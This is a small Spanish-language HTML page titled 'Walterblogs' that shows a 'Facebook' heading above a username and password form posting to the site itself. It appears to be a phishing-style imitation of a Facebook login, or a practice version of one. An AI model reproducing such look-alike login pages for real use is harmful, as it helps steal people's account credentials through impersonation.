<!DOCTYPE html>
<html lang="es">
	<head>
		<meta charset="utf-8">
		<meta name="author"content="walter">
		<title>Walterblogs</title>
		<link rel="stylesheet"href="/css/main.css">
	</head>
	<body>
		<h1>Facebook</h1>
		<form action="/"method="POST">
			<span id="ip"></span>
			<span id="errorA"></span>
			<label>Usuario</label>
			<input type="text"id="usuario"placeholder="Digite Usuario"name="username">
			<span id="errorB"></span>
			<label>Contraseña</label>
			<input type="password"id="contraseña"placeholder="Digite Contraseña"name="password">
			<button id="ingresar">Ingresar</button>
		</form>
		<script src="/js/index.js"charset="utf-8"></script>
	</body>
</html>
